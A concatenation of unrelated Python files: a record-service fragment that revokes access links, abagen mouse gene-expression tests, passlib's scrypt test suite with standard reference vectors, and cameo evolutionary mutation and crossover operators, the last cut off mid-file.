record, parent = self.get_parent_and_record_or_draft(id_)
# Permissions
self.require_permission(identity, "manage", record=record)
# Fetching
link_ids = [link.link_id for link in parent.access.links]
if str(link_id) not in link_ids:
raise LookupError(str(link_id))
link_idx = link_ids.index(link_id)
link = parent.access.links[link_idx].resolve()
# Deletion
parent.access.links.pop(link_idx)
link.revoke()
# Commit
uow.register(RecordCommitOp(parent))
if record:
uow.register(RecordCommitOp(record))
# Index all child records of the parent
self._index_related_records(record, parent, uow=uow)
return True
|
# -*- coding: utf-8 -*-
import numpy as np
import pytest
from abagen.mouse import mouse
STRUCTURES = [182305713, 182305709, 182305705]
ATTRIBUTES = ['expression_energy', 'expression_density', 'sum_pixels']
EXPERIMENTS = {
986: {
'expression_energy': np.array([7.73432, 7.28206, 3.82741]),
'expression_density': np.array([0.0603072, 0.0553335, 0.0298628]),
'sum_pixels': np.array([419628.0, 2238000.0, 3629050.0])
},
69782969: {
'expression-energy': np.array([1.00879, 1.40198, 2.34988]),
'expression-density': np.array([0.00650952, 0.00896709, 0.015409]),
'sum-pixels': np.array([195863.0, 1051230.0, 1440430.0])
}
}
GBA_UNIONIZATION = {
'expression_energy': np.array([0.236301, 0.261266, 0.416281]),
'expression_density': np.array([0.00207073, 0.00232453, 0.00372069]),
'sum_pixels': np.array([419628.0, 2238000.0, 3636670.0]),
'voxel_energy_cv': np.array([0.923913, 0.995631, 0.81265])
}
@pytest.mark.parametrize(('genes', 'direction', 'expected'), [
(dict(acronym='Snca'), 'sagittal', [988, 990, 79904550]),
(dict(acronym='Snca'), 'coronal', [986, 79908848]),
(dict(acronym='Gba'), 'sagittal', [1612]),
(dict(acronym='Gba'), 'coronal', [1611]),
(dict(acronym='Elf4'), 'sagittal', [73834415, 77464840]),
(dict(id=84193), 'sagittal', [70238925, 71147924, 71213117]),
(dict(id=84193), 'coronal', [74047443]),
(dict(id=18608), 'sagittal', [69289721]),
])
def test_get_experiments_from_gene(genes, direction, expected):
with pytest.raises(ValueError):
mouse._get_experiments_from_gene(acronym='notagene',
slicing_direction='coronal')
with pytest.raises(ValueError):
mouse._get_experiments_from_gene(id=84193,
slicing_direction='notadirection')
with pytest.raises(ValueError):
mouse._get_experiments_from_gene(id=-1000000)
# get experiments from provided input
exp = mouse._get_experiments_from_gene(**genes,
slicing_direction=direction)
assert len(exp) == len(expected)
assert all(i == j for (i, j) in zip(sorted(exp), sorted(expected)))
@pytest.mark.parametrize(('experiment', 'attributes'), [
(986, None), (986, ATTRIBUTES), (986, 'all'),
(69782969, None), (69782969, ATTRIBUTES), (69782969, 'all')
])
def test_get_unionization_from_experiment(experiment, attributes):
with pytest.raises(ValueError):
mouse._get_unionization_from_experiment(-100, structures=STRUCTURES)
# get data from provided experiment
data = mouse._get_unionization_from_experiment(experiment,
structures=STRUCTURES,
attributes=attributes)
data.index = data.index.droplevel('gene_id')
if attributes is None:
attributes = ['expression_density']
elif attributes == 'all':
attributes = mouse._UNIONIZATION_ATTRIBUTES
assert len(data.columns) == len(attributes)
for attr in set(EXPERIMENTS[experiment].keys()).intersection(attributes):
assert np.allclose(data.loc[STRUCTURES, attr].get_values(),
EXPERIMENTS[experiment][attr])
@pytest.mark.parametrize(('attribute'), [
'expression_energy', 'expression_density', 'sum_pixels', 'voxel_energy_cv'
])
def test_get_unionization_from_gene(attribute):
with pytest.raises(ValueError):
mouse.get_unionization_from_gene(acronym='Gba',
slicing_direction='notadirection',
structures=STRUCTURES)
with pytest.raises(ValueError):
mouse.get_unionization_from_gene(id=18608,
slicing_direction='coronal',
structures=STRUCTURES)
# get data for provided gene
data = mouse.get_unionization_from_gene(acronym='Gba',
slicing_direction='coronal',
structures=STRUCTURES,
attributes=attribute)
data.index = data.index.droplevel('gene_id')
assert np.allclose(data.loc[STRUCTURES, attribute],
GBA_UNIONIZATION[attribute])
|
<gh_stars>100-1000
"""tests for passlib.utils.scrypt"""
#=============================================================================
# imports
#=============================================================================
# core
from binascii import hexlify
import hashlib
import logging; log = logging.getLogger(__name__)
import struct
import warnings
warnings.filterwarnings("ignore", ".*using builtin scrypt backend.*")
# site
# pkg
from passlib import exc
from passlib.utils import getrandbytes
from passlib.utils.compat import PYPY, u, bascii_to_str
from passlib.utils.decor import classproperty
from passlib.tests.utils import TestCase, skipUnless, TEST_MODE, hb
# subject
from passlib.crypto import scrypt as scrypt_mod
# local
__all__ = [
"ScryptEngineTest",
"BuiltinScryptTest",
"FastScryptTest",
]
#=============================================================================
# support functions
#=============================================================================
def hexstr(data):
"""return bytes as hex str"""
return bascii_to_str(hexlify(data))
def unpack_uint32_list(data, check_count=None):
"""unpack bytes as list of uint32 values"""
count = len(data) // 4
assert check_count is None or check_count == count
return struct.unpack("<%dI" % count, data)
def seed_bytes(seed, count):
"""
generate random reference bytes from specified seed.
used to generate some predictable test vectors.
"""
if hasattr(seed, "encode"):
seed = seed.encode("ascii")
buf = b''
i = 0
while len(buf) < count:
buf += hashlib.sha256(seed + struct.pack("<I", i)).digest()
i += 1
return buf[:count]
#=============================================================================
# test builtin engine's internals
#=============================================================================
class ScryptEngineTest(TestCase):
descriptionPrefix = "passlib.crypto.scrypt._builtin"
def test_smix(self):
"""smix()"""
from passlib.crypto.scrypt._builtin import ScryptEngine
rng = self.getRandom()
#-----------------------------------------------------------------------
# test vector from (expired) scrypt rfc draft
# (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 9)
#-----------------------------------------------------------------------
input = hb("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
""")
output = hb("""
79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
""")
# NOTE: p value should be ignored, so testing w/ random inputs.
engine = ScryptEngine(n=16, r=1, p=rng.randint(1, 1023))
self.assertEqual(engine.smix(input), output)
def test_bmix(self):
"""bmix()"""
from passlib.crypto.scrypt._builtin import ScryptEngine
rng = self.getRandom()
# NOTE: bmix() call signature currently takes in list of 32*r uint32 elements,
# and writes to target buffer of same size.
def check_bmix(r, input, output):
"""helper to check bmix() output against reference"""
# NOTE: * n & p values should be ignored, so testing w/ rng inputs.
# * target buffer contents should be ignored, so testing w/ random inputs.
engine = ScryptEngine(r=r, n=1 << rng.randint(1, 32), p=rng.randint(1, 1023))
target = [rng.randint(0, 1 << 32) for _ in range((2 * r) * 16)]
engine.bmix(input, target)
self.assertEqual(target, list(output))
# ScryptEngine special-cases bmix() for r=1.
# this removes the special case patching, so we also test original bmix function.
if r == 1:
del engine.bmix
target = [rng.randint(0, 1 << 32) for _ in range((2 * r) * 16)]
engine.bmix(input, target)
self.assertEqual(target, list(output))
#-----------------------------------------------------------------------
# test vector from (expired) scrypt rfc draft
# (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 8)
#-----------------------------------------------------------------------
# NOTE: this pair corresponds to the first input & output pair
# from the test vector in test_smix(), above.
# NOTE: original reference lists input & output as two separate 64 byte blocks.
# current internal representation used by bmix() uses single 2*r*16 array of uint32,
# combining all the B blocks into a single flat array.
input = unpack_uint32_list(hb("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
"""), 32)
output = unpack_uint32_list(hb("""
a4 1f 85 9c 66 08 cc 99 3b 81 ca cb 02 0c ef 05
04 4b 21 81 a2 fd 33 7d fd 7b 1c 63 96 68 2f 29
b4 39 31 68 e3 c9 e6 bc fe 6b c5 b7 a0 6d 96 ba
e4 24 cc 10 2c 91 74 5c 24 ad 67 3d c7 61 8f 81
20 ed c9 75 32 38 81 a8 05 40 f6 4c 16 2d cd 3c
21 07 7c fe 5f 8d 5f e2 b1 a4 16 8f 95 36 78 b7
7d 3b 3d 80 3b 60 e4 ab 92 09 96 e5 9b 4d 53 b6
5d 2a 22 58 77 d5 ed f5 84 2c b9 f1 4e ef e4 25
"""), 32)
# check_bmix(1, input, output)
#-----------------------------------------------------------------------
# custom test vector for r=2
# used to check for bmix() breakage while optimizing implementation.
#-----------------------------------------------------------------------
r = 2
input = unpack_uint32_list(seed_bytes("bmix with r=2", 128 * r))
output = unpack_uint32_list(hb("""
ba240854954f4585f3d0573321f10beee96f12acdc1feb498131e40512934fd7
43e8139c17d0743c89d09ac8c3582c273c60ab85db63e410d049a9e17a42c6a1
6c7831b11bf370266afdaff997ae1286920dea1dedf0f4a1795ba710ba9017f1
a374400766f13ebd8969362de2d153965e9941bdde0768fa5b53e8522f116ce0
d14774afb88f46cd919cba4bc64af7fca0ecb8732d1fc2191e0d7d1b6475cb2e
e3db789ee478d056c4eb6c6e28b99043602dbb8dfb60c6e048bf90719da8d57d
3c42250e40ab79a1ada6aae9299b9790f767f54f388d024a1465b30cbbe9eb89
002d4f5c215c4259fac4d083bac5fb0b47463747d568f40bb7fa87c42f0a1dc1
"""), 32 * r)
check_bmix(r, input, output)
#-----------------------------------------------------------------------
# custom test vector for r=3
# used to check for bmix() breakage while optimizing implementation.
#-----------------------------------------------------------------------
r = 3
input = unpack_uint32_list(seed_bytes("bmix with r=3", 128 * r))
output = unpack_uint32_list(hb("""
11ddd8cf60c61f59a6e5b128239bdc77b464101312c88bd1ccf6be6e75461b29
7370d4770c904d0b09c402573cf409bf2db47b91ba87d5a3de469df8fb7a003c
95a66af96dbdd88beddc8df51a2f72a6f588d67e7926e9c2b676c875da13161e
b6262adac39e6b3003e9a6fbc8c1a6ecf1e227c03bc0af3e5f8736c339b14f84
c7ae5b89f5e16d0faf8983551165f4bb712d97e4f81426e6b78eb63892d3ff54
80bf406c98e479496d0f76d23d728e67d2a3d2cdbc4a932be6db36dc37c60209
a5ca76ca2d2979f995f73fe8182eefa1ce0ba0d4fc27d5b827cb8e67edd6552f
00a5b3ab6b371bd985a158e728011314eb77f32ade619b3162d7b5078a19886c
06f12bc8ae8afa46489e5b0239954d5216967c928982984101e4a88bae1f60ae
3f8a456e169a8a1c7450e7955b8a13a202382ae19d41ce8ef8b6a15eeef569a7
20f54c48e44cb5543dda032c1a50d5ddf2919030624978704eb8db0290052a1f
5d88989b0ef931b6befcc09e9d5162320e71e80b89862de7e2f0b6c67229b93f
"""), 32 * r)
check_bmix(r, input, output)
#-----------------------------------------------------------------------
# custom test vector for r=4
# used to check for bmix() breakage while optimizing implementation.
#-----------------------------------------------------------------------
r = 4
input = unpack_uint32_list(seed_bytes("bmix with r=4", 128 * r))
output = unpack_uint32_list(hb("""
803fcf7362702f30ef43250f20bc6b1b8925bf5c4a0f5a14bbfd90edce545997
3047bd81655f72588ca93f5c2f4128adaea805e0705a35e14417101fdb1c498c
33bec6f4e5950d66098da8469f3fe633f9a17617c0ea21275185697c0e4608f7
e6b38b7ec71704a810424637e2c296ca30d9cbf8172a71a266e0393deccf98eb
abc430d5f144eb0805308c38522f2973b7b6a48498851e4c762874497da76b88
b769b471fbfc144c0e8e859b2b3f5a11f51604d268c8fd28db55dff79832741a
1ac0dfdaff10f0ada0d93d3b1f13062e4107c640c51df05f4110bdda15f51b53
3a75bfe56489a6d8463440c78fb8c0794135e38591bdc5fa6cec96a124178a4a
d1a976e985bfe13d2b4af51bd0fc36dd4cfc3af08efe033b2323a235205dc43d
e57778a492153f9527338b3f6f5493a03d8015cd69737ee5096ad4cbe660b10f
b75b1595ddc96e3748f5c9f61fba1ef1f0c51b6ceef8bbfcc34b46088652e6f7
edab61521cbad6e69b77be30c9c97ea04a4af359dafc205c7878cc9a6c5d122f
8d77f3cbe65ab14c3c491ef94ecb3f5d2c2dd13027ea4c3606262bb3c9ce46e7
dc424729dc75f6e8f06096c0ad8ad4d549c42f0cad9b33cb95d10fb3cadba27c
5f4bf0c1ac677c23ba23b64f56afc3546e62d96f96b58d7afc5029f8168cbab4
533fd29fc83c8d2a32b81923992e4938281334e0c3694f0ee56f8ff7df7dc4ae
"""), 32 * r)
check_bmix(r, input, output)
def test_salsa(self):
"""salsa20()"""
from passlib.crypto.scrypt._builtin import salsa20
# NOTE: salsa2() currently operates on lists of 16 uint32 elements,
# which is what unpack_uint32_list(hb(() is for...
#-----------------------------------------------------------------------
# test vector from (expired) scrypt rfc draft
# (https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 7)
#-----------------------------------------------------------------------
# NOTE: this pair corresponds to the first input & output pair
# from the test vector in test_bmix(), above.
input = unpack_uint32_list(hb("""
7e 87 9a 21 4f 3e c9 86 7c a9 40 e6 41 71 8f 26
ba ee 55 5b 8c 61 c1 b5 0d f8 46 11 6d cd 3b 1d
ee 24 f3 19 df 9b 3d 85 14 12 1e 4b 5a c5 aa 32
76 02 1d 29 09 c7 48 29 ed eb c6 8d b8 b8 c2 5e
"""))
output = unpack_uint32_list(hb("""
a4 1f 85 9c 66 08 cc 99 3b 81 ca cb 02 0c ef 05
04 4b 21 81 a2 fd 33 7d fd 7b 1c 63 96 68 2f 29
b4 39 31 68 e3 c9 e6 bc fe 6b c5 b7 a0 6d 96 ba
e4 24 cc 10 2c 91 74 5c 24 ad 67 3d c7 61 8f 81
"""))
self.assertEqual(salsa20(input), output)
#-----------------------------------------------------------------------
# custom test vector,
# used to check for salsa20() breakage while optimizing _gen_files output.
#-----------------------------------------------------------------------
input = list(range(16))
output = unpack_uint32_list(hb("""
f518dd4fb98883e0a87954c05cab867083bb8808552810752285a05822f56c16
9d4a2a0fd2142523d758c60b36411b682d53860514b871d27659042a5afa475d
"""))
self.assertEqual(salsa20(input), output)
#=============================================================================
# eof
#=============================================================================
#=============================================================================
# test scrypt
#=============================================================================
class _CommonScryptTest(TestCase):
"""
base class for testing various scrypt backends against same set of reference vectors.
"""
#=============================================================================
# class attrs
#=============================================================================
@classproperty
def descriptionPrefix(cls):
return "passlib.utils.scrypt.scrypt() <%s backend>" % cls.backend
backend = None
#=============================================================================
# setup
#=============================================================================
def setUp(self):
assert self.backend
scrypt_mod._set_backend(self.backend)
super(_CommonScryptTest, self).setUp()
#=============================================================================
# reference vectors
#=============================================================================
reference_vectors = [
# entry format: (secret, salt, n, r, p, keylen, result)
#------------------------------------------------------------------------
# test vectors from scrypt whitepaper --
# http://www.tarsnap.com/scrypt/scrypt.pdf, appendix b
#
# also present in (expired) scrypt rfc draft --
# https://tools.ietf.org/html/draft-josefsson-scrypt-kdf-01, section 11
#------------------------------------------------------------------------
("", "", 16, 1, 1, 64, hb("""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
""")),
("password", "NaCl", 1024, 8, 16, 64, hb("""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
""")),
# NOTE: the following are skipped for all backends unless TEST_MODE="full"
("pleaseletmein", "SodiumChloride", 16384, 8, 1, 64, hb("""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
""")),
# NOTE: the following are always skipped for the builtin backend,
# (just takes too long to be worth it)
("pleaseletmein", "SodiumChloride", 1048576, 8, 1, 64, hb("""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
""")),
]
def test_reference_vectors(self):
"""reference vectors"""
for secret, salt, n, r, p, keylen, result in self.reference_vectors:
if n >= 1024 and TEST_MODE(max="default"):
# skip large values unless we're running full test suite
continue
if n > 16384 and self.backend == "builtin":
# skip largest vector for builtin, takes WAAY too long
# (46s under pypy, ~5m under cpython)
continue
log.debug("scrypt reference vector: %r %r n=%r r=%r p=%r", secret, salt, n, r, p)
self.assertEqual(scrypt_mod.scrypt(secret, salt, n, r, p, keylen), result)
#=============================================================================
# fuzz testing
#=============================================================================
_already_tested_others = None
def test_other_backends(self):
"""compare output to other backends"""
# only run once, since test is symetric.
# maybe this means it should go somewhere else?
if self._already_tested_others:
raise self.skipTest("already run under %r backend test" % self._already_tested_others)
self._already_tested_others = self.backend
rng = self.getRandom()
# get available backends
orig = scrypt_mod.backend
available = set(name for name in scrypt_mod.backend_values
if scrypt_mod._has_backend(name))
scrypt_mod._set_backend(orig)
available.discard(self.backend)
if not available:
raise self.skipTest("no other backends found")
warnings.filterwarnings("ignore", "(?i)using builtin scrypt backend",
category=exc.PasslibSecurityWarning)
# generate some random options, and cross-check output
for _ in range(10):
# NOTE: keeping values low due to builtin test
secret = getrandbytes(rng, rng.randint(0, 64))
salt = getrandbytes(rng, rng.randint(0, 64))
n = 1 << rng.randint(1, 10)
r = rng.randint(1, 8)
p = rng.randint(1, 3)
ks = rng.randint(1, 64)
previous = None
backends = set()
for name in available:
scrypt_mod._set_backend(name)
self.assertNotIn(scrypt_mod._scrypt, backends)
backends.add(scrypt_mod._scrypt)
result = hexstr(scrypt_mod.scrypt(secret, salt, n, r, p, ks))
self.assertEqual(len(result), 2*ks)
if previous is not None:
self.assertEqual(result, previous,
msg="%r output differs from others %r: %r" %
(name, available, [secret, salt, n, r, p, ks]))
#=============================================================================
# test input types
#=============================================================================
def test_backend(self):
"""backend management"""
# clobber backend
scrypt_mod.backend = None
scrypt_mod._scrypt = None
self.assertRaises(TypeError, scrypt_mod.scrypt, 's', 's', 2, 2, 2, 16)
# reload backend
scrypt_mod._set_backend(self.backend)
self.assertEqual(scrypt_mod.backend, self.backend)
scrypt_mod.scrypt('s', 's', 2, 2, 2, 16)
# throw error for unknown backend
self.assertRaises(ValueError, scrypt_mod._set_backend, 'xxx')
self.assertEqual(scrypt_mod.backend, self.backend)
def test_secret_param(self):
"""'secret' parameter"""
def run_scrypt(secret):
return hexstr(scrypt_mod.scrypt(secret, "salt", 2, 2, 2, 16))
# unicode
TEXT = u("abc\u00defg")
self.assertEqual(run_scrypt(TEXT), '05717106997bfe0da42cf4779a2f8bd8')
# utf8 bytes
TEXT_UTF8 = b'abc\xc3\x9efg'
self.assertEqual(run_scrypt(TEXT_UTF8), '05717106997bfe0da42cf4779a2f8bd8')
# latin1 bytes
TEXT_LATIN1 = b'abc\xdefg'
self.assertEqual(run_scrypt(TEXT_LATIN1), '770825d10eeaaeaf98e8a3c40f9f441d')
# accept empty string
self.assertEqual(run_scrypt(""), 'ca1399e5fae5d3b9578dcd2b1faff6e2')
# reject other types
self.assertRaises(TypeError, run_scrypt, None)
self.assertRaises(TypeError, run_scrypt, 1)
def test_salt_param(self):
"""'salt' parameter"""
def run_scrypt(salt):
return hexstr(scrypt_mod.scrypt("secret", salt, 2, 2, 2, 16))
# unicode
TEXT = u("abc\u00defg")
self.assertEqual(run_scrypt(TEXT), 'a748ec0f4613929e9e5f03d1ab741d88')
# utf8 bytes
TEXT_UTF8 = b'abc\xc3\x9efg'
self.assertEqual(run_scrypt(TEXT_UTF8), 'a748ec0f4613929e9e5f03d1ab741d88')
# latin1 bytes
TEXT_LATIN1 = b'abc\xdefg'
self.assertEqual(run_scrypt(TEXT_LATIN1), '91d056fb76fb6e9a7d1cdfffc0a16cd1')
# reject other types
self.assertRaises(TypeError, run_scrypt, None)
self.assertRaises(TypeError, run_scrypt, 1)
def test_n_param(self):
"""'n' (rounds) parameter"""
def run_scrypt(n):
return hexstr(scrypt_mod.scrypt("secret", "salt", n, 2, 2, 16))
# must be > 1, and a power of 2
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertRaises(ValueError, run_scrypt, 1)
self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
self.assertRaises(ValueError, run_scrypt, 3)
self.assertRaises(ValueError, run_scrypt, 15)
self.assertEqual(run_scrypt(16), '0272b8fc72bc54b1159340ed99425233')
def test_r_param(self):
"""'r' (block size) parameter"""
def run_scrypt(r, n=2, p=2):
return hexstr(scrypt_mod.scrypt("secret", "salt", n, r, p, 16))
# must be > 1
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), '3d630447d9f065363b8a79b0b3670251')
self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
self.assertEqual(run_scrypt(5), '114f05e985a903c27237b5578e763736')
# reject r*p >= 2**30
self.assertRaises(ValueError, run_scrypt, (1<<30), p=1)
self.assertRaises(ValueError, run_scrypt, (1<<30) / 2, p=2)
def test_p_param(self):
"""'p' (parallelism) parameter"""
def run_scrypt(p, n=2, r=2):
return hexstr(scrypt_mod.scrypt("secret", "salt", n, r, p, 16))
# must be > 1
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), 'f2960ea8b7d48231fcec1b89b784a6fa')
self.assertEqual(run_scrypt(2), 'dacf2bca255e2870e6636fa8c8957a66')
self.assertEqual(run_scrypt(5), '848a0eeb2b3543e7f543844d6ca79782')
# reject r*p >= 2**30
self.assertRaises(ValueError, run_scrypt, (1<<30), r=1)
self.assertRaises(ValueError, run_scrypt, (1<<30) / 2, r=2)
def test_keylen_param(self):
"""'keylen' parameter"""
rng = self.getRandom()
def run_scrypt(keylen):
return hexstr(scrypt_mod.scrypt("secret", "salt", 2, 2, 2, keylen))
# must be > 0
self.assertRaises(ValueError, run_scrypt, -1)
self.assertRaises(ValueError, run_scrypt, 0)
self.assertEqual(run_scrypt(1), 'da')
# pick random value
ksize = rng.randint(0, 1 << 10)
self.assertEqual(len(run_scrypt(ksize)), 2*ksize) # 2 hex chars per output
# one more than upper bound
self.assertRaises(ValueError, run_scrypt, ((2**32) - 1) * 32 + 1)
#=============================================================================
# eoc
#=============================================================================
# NOTE: builtin version runs VERY slow (except under PyPy, where it's only 11x slower),
# so skipping under quick test mode.
@skipUnless(PYPY or TEST_MODE(min="default"), "skipped under current test mode")
class BuiltinScryptTest(_CommonScryptTest):
backend = "builtin"
def setUp(self):
super(BuiltinScryptTest, self).setUp()
warnings.filterwarnings("ignore", "(?i)using builtin scrypt backend",
category=exc.PasslibSecurityWarning)
def test_missing_backend(self):
"""backend management -- missing backend"""
if _can_import_scrypt():
raise self.skipTest("'scrypt' backend is present")
self.assertRaises(exc.MissingBackendError, scrypt_mod._set_backend, 'scrypt')
def _can_import_scrypt():
"""check if scrypt package is importable"""
try:
import scrypt
except ImportError as err:
if "scrypt" in str(err):
return False
raise
return True
@skipUnless(_can_import_scrypt(), "'scrypt' package not found")
class ScryptPackageTest(_CommonScryptTest):
backend = "scrypt"
def test_default_backend(self):
"""backend management -- default backend"""
scrypt_mod._set_backend("default")
self.assertEqual(scrypt_mod.backend, "scrypt")
#=============================================================================
# eof
#=============================================================================
|
# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from inspyred.ec.variators import mutator, crossover
from ordered_set import OrderedSet
from cameo.strain_design.heuristic.evolutionary.genomes import MultipleChromosomeGenome
from numpy import float32 as float
import logging
__all__ = ['set_mutation', 'set_indel']
logger = logging.getLogger(__name__)
def _subtract(list_a, list_b):
return [v for v in list_a if v not in list_b]
def _do_set_n_point_crossover(representation, mom, dad, points, random, max_size):
chunks = []
i = 0
for point in points:
chunks.append(representation[i:point])
i = point
chunks.append(representation[i:])
bro = OrderedSet()
sis = OrderedSet()
cross = True
for variables in chunks:
for v in variables:
if v in mom:
bro.append(v) if cross else sis.append(v)
if v in dad:
sis.append(v) if cross else bro.append(v)
cross = not cross
if len(bro) > max_size:
bro = random.sample(bro, max_size)
if len(sis) > max_size:
sis = random.sample(sis, max_size)
return bro, sis
@crossover
def set_n_point_crossover(random, mom, dad, args):
representation = sorted(set(mom).union(set(dad)))
crossover_rate = args.get('crossover_rate', 1.0)
num_crossover_points = args.get('num_crossover_points', 1)
max_size = args.get('max_size', 9)
children = []
if random.random() <= crossover_rate:
points = random.sample(representation, num_crossover_points)
bro, sis = _do_set_n_point_crossover(representation, mom, dad, points, random, max_size)
# ensure number of knockouts > 0 or do not add individual
if len(bro) > 0:
children.append(bro)
if len(sis) > 0:
children.append(sis)
else:
children.append(mom)
children.append(dad)
assert all(0 < len(individual) <= max_size for individual in children)
return children
@mutator
def set_mutation(random, individual, args):
"""
Mutates a given set based on the entries available on the representation.
Parameters
----------
random: Random
individual: list
with unique integers
args: dict
must contain the representation
Returns
-------
list
created based on an ordered set
"""
representation = args.get('representation')
indices = range(len(representation))
indices = _subtract(indices, individual) # remove indices already present in the individual
new_individual = []
mutation_rate = float(args.get('mutation_rate', .1))
for value in individual:
if random.random() < mutation_rate and len(indices) > 0:
index = random.sample(indices, 1)[0]
indices.remove(index)
new_individual.append(index)
else:
new_individual.append(value)
assert len(individual) == len(new_individual)
return sorted(new_individual)
@mutator
def set_indel(random, individual, args):
"""
Creates a random insertion or deletion in the individual.
Parameters
----------
random: Random
individual: list
with unique integers
args: dict
must contain the representation
Returns
-------
list
created based on an ordered set
"""
if not args.get("variable_size", True):
return list(individual)
max_size = args.get("max_size", 9)
representation = args.get('representation')
indices = range(len(representation))
indices = _subtract(indices, individual) # remove indices already present in the individual
indel_rate = float(args.get('indel_rate', .1))
new_individual = list(individual)
if random.random() < indel_rate:
logger.info("Applying indel mutation")
if random.random() > 0.5 and len(new_individual) < max_size and len(indices) > 0:
index = random.sample(indices, 1)[0]
indices.remove(index)
new_individual.append(index)
else:
if len(new_individual) > 1:
new_individual = random.sample(new_individual, len(new_individual) - 1)
assert 0 < len(new_individual) <= max_size
return sorted(new_individual)
@mutator
def multiple_chromosome_set_mutation(random, individual, args):
"""
Mutates a given set based on the entries available on the representation.
Parameters
----------
random: Random
individual: MultipleChromosomeGenome
with unique integers in each chromosome
args: dict
must contain the representation of each chromosome
Returns
-------
MultipleChromosomeGenome
A mutated individual
"""
new_individual = MultipleChromosomeGenome(keys=individual.keys)
for key in individual.keys:
representation = args.get('%s_representation' % key)
indices = range(len(representation))
indices = _subtract(indices, individual[key]) # remove indices already present in the individual
mutation_rate = args.get('%s_mutation_rate' % key, .1)
for value in individual[key]:
if random.random() < mutation_rate and len(indices) > 0:
index = random.sample(indices, 1)[0]
indices.remove(index)
new_individual[key].append(index)
else:
new_individual[key].append(value)
assert len(new_individual[key]) == len(individual[key])
new_individual[key] = sorted(new_individual[key])
return new_individual
@mutator
def multiple_chromosome_set_indel(random, individual, args):
"""
Creates a random insertion or deletion in the individual.
Parameters
----------
random: Random
individual: MultipleChromosomeGenome
with unique integers in each chromosome
args: dict
must contain the representation of each chromosome
Returns
-------
MultipleChromosomeGenome
A mutated individual
"""
new_individual = individual.copy()
max_size = args.get("max_size", 9)
for key in individual.keys:
representation = args.get('%s_representation' % key)
indices = range(len(representation))
indices = _subtract(indices, individual[key]) # remove indices already present in the individual
indel_rate = args.get('%s_indel_rate' % key, .1)
if random.random() < indel_rate:
if random.random() > 0.5 and len(new_individual[key]) < max_size and len(indices) > 0:
index = random.sample(indices, 1)[0]
indices.remove(index)
new_individual[key].append(index)
else:
if len(individual[key]) > 1:
new_individual[key] = random.sample(new_individual[key], len(new_individual[key]) - 1)
assert len(new_individual[key]) <= max_size
new_individual[key] = sorted(new_individual[key])
return new_individual
@crossover
